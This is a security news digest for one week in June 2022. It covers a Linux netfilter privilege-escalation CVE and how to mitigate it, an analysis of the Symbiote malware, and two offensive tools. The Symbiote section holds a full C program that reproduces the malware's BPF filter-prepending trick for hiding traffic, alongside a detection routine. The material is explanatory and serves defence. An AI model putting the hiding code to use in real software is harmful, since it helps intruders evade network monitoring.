Weekly in Security 202223

2022-06-06 to 2022-06-13


Introduction

Weekly in Security is a summary of the cybersecurity news from the past week. This post covers 2022-06-06 to 2022-06-13.

Vulnerabilities

CVE-2022-1966 - Local privilege escalation via use-after-free in netfilter

A use-after-free write in the netfilter nf_tables subsystem (net/netfilter/nf_tables_api.c) can be exploited by a local user to escalate privileges to root. Reaching the vulnerable code requires CAP_NET_ADMIN in a network namespace, which an unprivileged user obtains by creating a user namespace and a network namespace inside it, so every system that allows unprivileged user namespaces is affected. Note that CVE-2022-1966 was later rejected as a duplicate of CVE-2022-32250; the latter is the identifier vendor advisories use.

The author's article includes proof-of-concept exploit code. The fix is already in the mainline kernel repository, but it usually takes a while until it reaches every distribution kernel, so check your vendor's advisory for the patched package version.

As a mitigation, creation of user namespaces can be disabled. Unprivileged user namespaces are mainly needed by rootless containers and some application sandboxes, so on servers without such workloads this is usually harmless; check what depends on them first. Two caveats: user.max_user_namespaces=0 is a hard limit that also stops root (and features such as systemd's PrivateUsers=) from creating new user namespaces, and it only removes the unprivileged route to CAP_NET_ADMIN, so a user who already holds that capability can still reach nf_tables. Debian-based kernels additionally carry the kernel.unprivileged_userns_clone sysctl, which blocks only unprivileged users and leaves root-created namespaces working. After applying the setting, running unshare -Urn true as an unprivileged user must fail.

# run as root; the drop-in file makes the setting persist across reboots
echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
sysctl -p /etc/sysctl.d/userns.conf

News

Symbiote Deep-Dive

Intezer, together with BlackBerry, published an analysis of Symbiote, a Linux malware that is nearly impossible to detect. The analysis is based on the vendor's own tool, Intezer Analyze. Technically, the malware is a shared object that gets loaded into every process via LD_PRELOAD (ATT&CK T1574.006, Dynamic Linker Hijacking), where it hooks libc functions to hide its files, processes and connections, and it relies on BPF bytecode to hide its network traffic from packet captures.

When a packet capture tool starts on an infected host, it attaches a classic BPF program to its socket (setsockopt with SO_ATTACH_FILTER) that tells the kernel which packets to deliver. Symbiote intercepts this step from the preloaded library and puts its own bytecode in front of the tool's program, so packets belonging to its own traffic are dropped before the tool's filter runs and never show up in the capture.
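To make the mechanism concrete, here is an added example that is not code from the Intezer/BlackBerry write-up or from Symbiote itself: a classic-BPF prefix that drops IPv4 TCP/UDP packets on one port, the prepend step a hooked setsockopt() would perform, and a check that recovers the hidden port from a filter read back with getsockopt(SO_GET_FILTER). The struct layout and opcode values mirror <linux/filter.h> but are redefined so the file compiles on any platform; the hidden port 4444 and the sample tcpdump "ip" filter are assumptions.

```c
/* Added example, not Symbiote's code. Models a hooked
 * setsockopt(SO_ATTACH_FILTER) that prepends a drop-prefix to the capture
 * tool's classic-BPF program, plus a check for that prefix. Assumptions:
 * hidden port 4444, sample filter = tcpdump -dd "ip". */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct cbpf_insn { uint16_t code; uint8_t jt; uint8_t jf; uint32_t k; };

/* classic BPF opcodes, same numeric values as in linux/filter.h */
#define LD_H_ABS 0x28 /* A = 16-bit word at pkt[k]              */
#define LD_B_ABS 0x30 /* A = byte at pkt[k]                     */
#define LD_X_MSH 0xb1 /* X = 4 * (pkt[k] & 0x0f): IP hdr length */
#define LD_H_IND 0x48 /* A = 16-bit word at pkt[X + k]          */
#define JEQ_K    0x15 /* pc += (A == k) ? jt : jf               */
#define JSET_K   0x45 /* pc += (A & k)  ? jt : jf               */
#define RET_K    0x06 /* return k: 0 drops, >0 keeps k bytes    */

#define PREFIX_LEN  13
#define HIDDEN_PORT 4444

/* Drop-prefix for Ethernet/IPv4 frames. cBPF jumps are offsets from the
 * next instruction, so "13" is wherever the original program starts. */
static void build_hide_prefix(struct cbpf_insn *out, uint16_t port)
{
    const struct cbpf_insn p[PREFIX_LEN] = {
        { LD_H_ABS, 0,  0, 12     }, /*  0: A = ethertype               */
        { JEQ_K,    0, 11, 0x0800 }, /*  1: not IPv4 -> 13 (original)   */
        { LD_B_ABS, 0,  0, 23     }, /*  2: A = IP protocol             */
        { JEQ_K,    1,  0, 6      }, /*  3: TCP -> 5                    */
        { JEQ_K,    0,  8, 17     }, /*  4: UDP -> 5, other -> 13       */
        { LD_H_ABS, 0,  0, 20     }, /*  5: A = flags + fragment offset */
        { JSET_K,   6,  0, 0x1fff }, /*  6: non-first fragment -> 13    */
        { LD_X_MSH, 0,  0, 14     }, /*  7: X = IP header length        */
        { LD_H_IND, 0,  0, 14     }, /*  8: A = source port             */
        { JEQ_K,    2,  0, port   }, /*  9: match -> 12 (drop)          */
        { LD_H_IND, 0,  0, 16     }, /* 10: A = destination port        */
        { JEQ_K,    0,  1, port   }, /* 11: match -> 12, else -> 13     */
        { RET_K,    0,  0, 0      }, /* 12: return 0: tool never sees it */
    };
    memcpy(out, p, sizeof p);
}

/* What the hooked setsockopt() hands to the kernel: prefix + the caller's
 * program copied verbatim (relative jumps need no fix-up). Caller frees. */
static struct cbpf_insn *prepend_hide_filter(const struct cbpf_insn *orig,
                                             size_t orig_len, uint16_t port,
                                             size_t *out_len)
{
    struct cbpf_insn *prog = calloc(PREFIX_LEN + orig_len, sizeof *prog);
    if (!prog) return NULL;
    build_hide_prefix(prog, port);
    memcpy(prog + PREFIX_LEN, orig, orig_len * sizeof *orig);
    *out_len = PREFIX_LEN + orig_len;
    return prog;
}

/* Check side: a tool can read its filter back with getsockopt(SO_GET_FILTER).
 * Recognises the prefix shape above and returns the hidden port, else 0. */
static uint16_t hidden_port_in(const struct cbpf_insn *prog, size_t len)
{
    struct cbpf_insn ref[PREFIX_LEN];
    if (len <= PREFIX_LEN) return 0;
    uint16_t port = (uint16_t)prog[9].k;
    if (port == 0 || prog[11].k != port) return 0;
    build_hide_prefix(ref, port);
    return memcmp(prog, ref, sizeof ref) == 0 ? port : 0;
}

/* Constructed sample: tcpdump -dd "ip" (keep IPv4 frames, drop the rest). */
static const struct cbpf_insn sample_ip_filter[4] = {
    { LD_H_ABS, 0, 0, 12 }, { JEQ_K, 0, 1, 0x0800 },
    { RET_K, 0, 0, 262144 }, { RET_K, 0, 0, 0 },
};

/* Returns the port recovered from a tampered copy of sample_ip_filter,
 * or 0 if the original program was not preserved behind the prefix. */
static int self_check(void)
{
    size_t n;
    struct cbpf_insn *prog = prepend_hide_filter(sample_ip_filter, 4, HIDDEN_PORT, &n);
    if (!prog) return 0;
    int intact = n == PREFIX_LEN + 4 &&
        memcmp(prog + PREFIX_LEN, sample_ip_filter, sizeof sample_ip_filter) == 0;
    int port = intact ? hidden_port_in(prog, n) : 0;
    free(prog);
    return port;
}

int main(void)
{
    size_t n;
    struct cbpf_insn *prog = prepend_hide_filter(sample_ip_filter, 4, HIDDEN_PORT, &n);
    if (!prog) return 1;
    for (size_t i = 0; i < n; i++) /* tcpdump -dd style, usable in a sock_fprog */
        printf("{ 0x%x, %u, %u, 0x%08x },\n", (unsigned)prog[i].code,
               (unsigned)prog[i].jt, (unsigned)prog[i].jf, (unsigned)prog[i].k);
    printf("hidden port recovered: %u\n", (unsigned)hidden_port_in(prog, n));
    free(prog);
    return 0;
}
```

Because cBPF jump targets are offsets from the next instruction, the original program can be appended unchanged, which is what makes this trick cheap for the malware. For the same reason a capture tool that reads its filter back and finds more instructions than it attached has a strong signal of tampering; a preloaded library can hook getsockopt() as well, though, so the reliable check runs outside the infected process (a statically linked tool, or a forensic image of the host).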

A similar sample is BPFdoor (VirusTotal), a Linux backdoor that attaches a BPF filter to a raw socket so it can react to a magic packet without opening a listening port.

Tools

Deepfake Offensive Toolkit

dot (aka Deepfake Offensive Toolkit) makes real-time, controllable deepfakes ready for virtual camera injection. It was created for penetration testing against e.g. identity verification and video conferencing systems, for use by security analysts, Red Team members and biometrics researchers.

This also sounds like a great toolkit for social engineering engagements.

Hashview

A web front-end for password cracking and analytics

Version v0.8.0-Beta was released; it is a complete rewrite of v0.7.4.